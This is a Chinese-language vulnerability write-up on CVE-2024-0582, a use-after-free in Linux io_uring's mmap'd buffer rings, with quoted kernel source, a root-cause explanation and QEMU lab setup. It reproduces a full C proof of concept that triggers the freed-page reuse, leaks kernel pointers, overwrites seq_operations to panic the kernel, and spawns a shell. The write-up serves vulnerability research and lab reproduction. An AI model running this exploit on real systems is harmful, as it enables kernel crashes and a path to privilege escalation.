CVE-2024-0582 是发生在 Linux Kernel 的 io_uring 这一个高性能异步 IO API 中的漏洞,得益于对使用 IORING_REGISTER_PBUF_RING 注册的 ring buffer 在 mmap() 映射的情况下存在可以在释放后仍被使用的 UAF 漏洞,攻击者可以通过该漏洞攻击内核并完成内核提权;该漏洞的 CVSS 分数为 7.8,影响版本包括但不限于 6.4~6.6.5,本文我们选用 6.4 的版本内核源码进行分析。

漏洞分析

PBUF_RING Internal

我们这里主要关注 io_uring_register 函数中 switch 中与 PBUF_RING 相关的部分

注册:IORING_REGISTER_PBUF_RING

对于这个漏洞我们主要关注当 opcode == IORING_REGISTER_PBUF_RING 的情况,该 opcode 意味着注册一个环形缓冲区,其最终会调用到 io_register_pbuf_ring() 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_reg reg;
struct io_buffer_list *bl, *free_bl = NULL;
int ret;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;

if (reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (reg.flags & ~IOU_PBUF_RING_MMAP)
return -EINVAL;
if (!(reg.flags & IOU_PBUF_RING_MMAP)) {
if (!reg.ring_addr)
return -EFAULT;
if (reg.ring_addr & ~PAGE_MASK)
return -EINVAL;
} else {
if (reg.ring_addr)
return -EINVAL;
}

if (!is_power_of_2(reg.ring_entries))
return -EINVAL;

/* cannot disambiguate full vs empty due to head/tail size */
if (reg.ring_entries >= 65536)
return -EINVAL;

if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) {
int ret = io_init_bl_list(ctx);
if (ret)
return ret;
}

bl = io_buffer_get_list(ctx, reg.bgid);
if (bl) {
/* if mapped buffer ring OR classic exists, don't allow */
if (bl->is_mapped || !list_empty(&bl->buf_list))
return -EEXIST;
} else {
free_bl = bl = kzalloc(sizeof(*bl), GFP_KERNEL);
if (!bl)
return -ENOMEM;
}

if (!(reg.flags & IOU_PBUF_RING_MMAP))
ret = io_pin_pbuf_ring(&reg, bl);
else
ret = io_alloc_pbuf_ring(&reg, bl);

if (!ret) {
bl->nr_entries = reg.ring_entries;
bl->mask = reg.ring_entries - 1;

io_buffer_add_list(ctx, bl, reg.bgid);
return 0;
}

kfree(free_bl);
return ret;
}

关注存在 IOU_PBUF_RING_MMAP 标志时会调用 io_alloc_pbuf_ring 函数,由内核分配连续页面,否则调用 io_pin_pbuf_ring 函数将用户态页面 pin 到 ring 上,(当 io_buffer_get_list 获取到的 bl 为空时会调用到这里进行分配)
IOU_PBUF_RING_MMAP 标志表示由内核分配环形缓冲区的内存,之后用户态应用使用 mmap() 映射来访问:
继续查看 io_alloc_pbuf_ring() 函数,可以看到调用 __get_free_pages 来分配页面,flag 为 GFP_KERNEL_ACCOUNT :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
unsigned long __get_free_pages(gfp_t gfp_mask, unsigned int order)
{
struct page *page;

page = alloc_pages(gfp_mask & ~__GFP_HIGHMEM, order);
if (!page)
return 0;
return (unsigned long) page_address(page);
}
EXPORT_SYMBOL(__get_free_pages);
static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
size_t ring_size;
void *ptr;

ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
if (!ptr)
return -ENOMEM;

bl->buf_ring = ptr;
bl->is_mapped = 1;
bl->is_mmap = 1;
return 0;
}

分配的结构体为 io_uring_buf_ring ,其定义如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
struct io_uring_buf_ring {
union {
/*
* To avoid spilling into more pages than we need to, the
* ring tail is overlaid with the io_uring_buf->resv field.
*/
struct {
__u64 resv1;
__u32 resv2;
__u16 resv3;
__u16 tail;
};
__DECLARE_FLEX_ARRAY(struct io_uring_buf, bufs);
};
};

图示:

注销:IORING_UNREGISTER_PBUF_RING

注销 PBUF_RING 对应的操作为 IORING_UNREGISTER_PBUF_RING ,内核会调用到 io_unregister_pbuf_ring 进行处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_reg reg;
struct io_buffer_list *bl;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;
if (reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (reg.flags)
return -EINVAL;

bl = io_buffer_get_list(ctx, reg.bgid);
if (!bl)
return -ENOENT;
if (!bl->is_mapped)
return -EINVAL;

__io_remove_buffers(ctx, bl, -1U);
if (bl->bgid >= BGID_ARRAY) {
xa_erase(&ctx->io_bl_xa, bl->bgid);
kfree(bl);
}
return 0;
}

通过 __io_remove_buffers 函数来释放 bl ,然后使用 xa_erase 函数移除该 io_buffer_list 并释放。
__io_remove_buffers 函数定义如下,由于在 alloc 时制定了 is_mapped = 1; is_mmap=1,因此会走以下路径:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
static int __io_remove_buffers(struct io_ring_ctx *ctx,
struct io_buffer_list *bl, unsigned nbufs)
{
unsigned i = 0;

/* shouldn't happen */
if (!nbufs)
return 0;

if (bl->is_mapped) {
i = bl->buf_ring->tail - bl->head;
if (bl->is_mmap) {
struct page *page;

page = virt_to_head_page(bl->buf_ring);
if (put_page_testzero(page))
free_compound_page(page);
bl->buf_ring = NULL;
bl->is_mmap = 0;
} else if {
...
}
/* make sure it's seen as empty */
INIT_LIST_HEAD(&bl->buf_list);
bl->is_mapped = 0;
return i;
}

...
}

使用:io_uring_mmap

可以通过 mmap() 对 io_uring 的 fd 进行映射,内核最终会调用到 io_uring_mmap() 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
{
size_t sz = vma->vm_end - vma->vm_start;
unsigned long pfn;
void *ptr;

ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
if (IS_ERR(ptr))
return PTR_ERR(ptr);

pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
}

//...

static const struct file_operations io_uring_fops = {
.release = io_uring_release,
.mmap = io_uring_mmap,

继续查看 io_uring_validate_mmap_request 函数内容,可以发现在对 pbuf 的获取指针是 ctx 的 bl:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
void *io_pbuf_get_address(struct io_ring_ctx *ctx, unsigned long bgid)
{
struct io_buffer_list *bl;

bl = io_buffer_get_list(ctx, bgid);
if (!bl || !bl->is_mmap)
return NULL;

return bl->buf_ring;
}
static void *io_uring_validate_mmap_request(struct file *file,
loff_t pgoff, size_t sz)
{
struct io_ring_ctx *ctx = file->private_data;
loff_t offset = pgoff << PAGE_SHIFT;
struct page *page;
void *ptr;

switch (offset & IORING_OFF_MMAP_MASK) {
case IORING_OFF_SQ_RING:
case IORING_OFF_CQ_RING:
ptr = ctx->rings;
break;
case IORING_OFF_SQES:
ptr = ctx->sq_sqes;
break;
case IORING_OFF_PBUF_RING: {
unsigned int bgid;

bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT;
mutex_lock(&ctx->uring_lock);
ptr = io_pbuf_get_address(ctx, bgid);
mutex_unlock(&ctx->uring_lock);
if (!ptr)
return ERR_PTR(-EINVAL);
break;
}
default:
return ERR_PTR(-EINVAL);
}

page = virt_to_head_page(ptr);
if (sz > page_size(page))
return ERR_PTR(-EINVAL);

return ptr;
}

漏洞成因

当我们将 bl->buf_ring 的内存通过 mmap() 映射出去后,仍然可以通过 io_unregister_pbuf_ring 函数将这块内存释放掉,因此可以先进行内存分配,再 mmap,最后再释放这块内存就直接有一个 UAF:可以通过 mmap 的内存区域直接读写释放掉的内存页。

POC

这里直接 copy 了 a3 的 poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
/**
* Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <liburing.h>
#include <sys/mman.h>
#include <sys/user.h>

#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif

#define SUCCESSS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}

struct io_uring_buf_ring*
setup_pbuf_ring_mmap(struct io_uring *ring, unsigned int ring_entries,
int bgid, unsigned int flags, int *retp)
{
struct io_uring_buf_ring *buf_ring;
struct io_uring_buf_reg buf_reg;
size_t ring_size;
off_t offset;
int ret;

memset(&buf_reg, 0, sizeof(buf_reg));

/* we don't need to set reg.addr for IOU_PBUF_RING_MMAP */
buf_reg.ring_entries = ring_entries;
buf_reg.bgid = bgid;
buf_reg.flags = IOU_PBUF_RING_MMAP;

ret = io_uring_register_buf_ring(ring, &buf_reg, flags);
if (ret) {
puts(ERR_MSG("[x] Error occur while doing io_uring_register_buf_ring"));
*retp = ret;
return NULL;
}

/**
[chr(int(i,16))for i in['3361626e74747261'[i:i+2]for i in range(0,16,2)]][::-1]
**/
offset = IORING_OFF_PBUF_RING | (uint64_t) bgid << IORING_OFF_PBUF_SHIFT;
ring_size = ring_entries * sizeof(struct io_uring_buf);
buf_ring = mmap(
NULL,
ring_size,
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
ring->ring_fd,
offset
);

if (IS_ERR(buf_ring)) {
puts(ERR_MSG("[x] Error occur while doing mmap() for io_uring"));
*retp = PTR_ERR(buf_ring);
return NULL;
}

*retp = 0;
return buf_ring;
}

#define NR_PAGES 1
#define NR_BUFFERS 0x100
#define SEQ_FILE_NR 0x200

void proof_of_concept(void)
{
struct io_uring ring;
void **buffers;
int seq_fd[SEQ_FILE_NR], found = 0;
int ret;

puts(SUCCESSS_MSG("-------- CVE-2024-0582 Proof-of-concet --------"));
puts(INFO_MSG("-------\t\t Author: ") "arttnba3" INFO_MSG(" \t-------"));
puts(SUCCESSS_MSG("-----------------------------------------------\n"));

puts("[*] Preparing...");

bind_core(0);

if (io_uring_queue_init(4, &ring, 0) < 0) {
perror(ERR_MSG("[x] Unable to init for io_uring queue"));
exit(EXIT_FAILURE);
}

puts("[*] Allocating pbuf ring and doing mmap()...");

buffers = calloc(NR_BUFFERS, sizeof(void*));
for (int i = 0; i < NR_BUFFERS; i++) {
buffers[i] = setup_pbuf_ring_mmap(
&ring,
NR_PAGES * PAGE_SIZE / sizeof(struct io_uring_buf),
i,
0,
&ret
);
if (ret) {
printf(
ERR_MSG("[x] Unable to set up") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}

io_uring_buf_ring_init(buffers[i]);
}

puts("[*] Triggering page-level UAF vulnerabilities...");

for (int i = 0; i < NR_BUFFERS; i++) {
ret = io_uring_unregister_buf_ring(&ring, i);
if (ret) {
printf(
ERR_MSG("[x] Unable to unregister") " No.%d "
ERR_MSG("pbuf ring, error code: ") "%d\n",
i,
ret
);
exit(EXIT_FAILURE);
}
}

puts("[*] Reallocating page into seq_file::seq_operations...");

for (int i = 0; i < SEQ_FILE_NR; i++) {
if ((seq_fd[i] = open("/proc/self/stat", O_RDONLY)) < 0) {
printf(
ERR_MSG("[x] Unable to open") " No.%d "
ERR_MSG("seq file, error code: ") "%d\n",
i,
seq_fd[i]
);
exit(EXIT_FAILURE);
}
}

puts("[*] Checking data leak and overwriting...");

for (int i = 0; i < NR_BUFFERS; i++) {
uint64_t *buffer = buffers[i];
for (int j = 0; j < (NR_PAGES * PAGE_SIZE / sizeof(uint64_t)); j++) {
if (buffer[j]>0xffffffff80000000 && buffer[j]<0xfffffffff0000000) {
printf(
SUCCESSS_MSG("[+] Got kernel data leak:") " %lx "
SUCCESSS_MSG("at location ") "%d-%d\n",
buffer[j],
i,
j
);
buffer[j] = *(uint64_t*) "arttnba3";
found = 1;
goto out;
}
}
}

if (!found) {
puts(ERR_MSG("[x] Failed to reallocate UAF page as seq_operations!"));
exit(EXIT_FAILURE);
}

out:
puts("[*] Triggering kernel panic...");

sleep(1);

for (int i = 0; i < SEQ_FILE_NR; i++) {
char buf[0x1000];
read(seq_fd[i], buf, 1);
}

puts("[?] So you're still alive here!?");
system("/bin/sh");
}

int main(int argc, char **argv, char **envp)
{
proof_of_concept();
return 0;
}

漏洞复现

这里我们选择 linux-6.4.16 内核源码进行编译

1
2
3
4
5
6
wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v6.x/linux-6.4.16.tar.xz
unxz linux-6.4.16.tar.xz
# choose config, all default is good
make menuconfig


有一个证书功能的报错:https://blog.csdn.net/m0_47696151/article/details/121574718
另外 gcc 版本不要太新(arch 复现环境的痛 XD,在服务器上 gcc 11.1 可以成功编译)

使用 busybox 来搭建基本文件系统

1
2
3
4
5
6
7
8
wget https://busybox.net/downloads/busybox-1.36.0.tar.bz2
tar -jxvf busybox-1.36.0.tar.bz2
# `Settings` ---> `Build static binary file (no shared lib)` to compile static busybox
# 可选项:在 Linux System Utilities 中取消选中 Support mounting NFS file systems on Linux <2.6.23 (NEW);在 Networking Utilities 中取消选中 inetd。
make menuconfig
make -j$(nproc)
make install

配置文件系统,在编译生成的 _install 目录下创建基本的文件系统结构

配置文件系统 

我们首先在 _install 目录下创建基本的文件系统结构:

1
2
3
4
5
6
cd _install
mkdir -pv {bin,sbin,etc,proc,sys,dev,home/ctf,root,tmp,lib64,lib/x86_64-linux-gnu,usr/{bin,sbin}}
touch etc/inittab
mkdir etc/init.d
touch etc/init.d/rcS
chmod +x ./etc/init.d/rcS

在我们创建的 ./etc/inittab 中写入如下内容:

1
2
3
4
5
6
::sysinit:/etc/init.d/rcS
::askfirst:/bin/login
::ctrlaltdel:/sbin/reboot
::shutdown:/sbin/swapoff -a
::shutdown:/bin/umount -a -r
::restart:/sbin/init

在上面的文件中指定了系统初始化脚本为 etc/init.d/rcS,因此接下来我们配置这个文件写入如下内容,主要是挂载各种文件系统,以及设置各目录的权限,并创建一个非特权用户:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/bin/sh
chown -R root:root /
chmod 700 /root
chown -R ctf:ctf /home/ctf
mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs tmpfs /tmp
mkdir /dev/pts
mount -t devpts devpts /dev/pts
echo 1 > /proc/sys/kernel/dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrict
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
cd /home/ctf
su ctf -c sh
poweroff -d 0 -f

`

然后为这个脚本添加可执行权限,该脚本通常用作我们自定义的环境初始化脚本:
chmod +x ./etc/init.d/rcS

接下来我们配置用户组相关权限,在这里建立了两个用户组 root 和 ctf ,以及两个用户 root 和 ctf,并配置了一条文件系统挂载项:

1
2
3
4
5
echo "root:x:0:0:root:/root:/bin/sh" > etc/passwd 
echo "ctf:x:1000:1000:ctf:/home/ctf:/bin/sh" >> etc/passwd
echo "root:x:0:" > etc/group
echo "ctf:x:1000:" >> etc/group
echo "none /dev/pts devpts gid=5,mode=620 0 0" > etc/fstab`

打包文件系统
按 cpio 格式打包即可,最后设置启动脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh 
qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-initrd ./rootfs.cpio \
-monitor /dev/null \
-append "root=/dev/ram rdinit=/sbin/init console=ttyS0 oops=panic panic=1 loglevel=3 quiet kaslr" \
-cpu kvm64,+smep \
-smp cores=2,threads=1 \
-nographic \
-snapshot \
-s

参考链接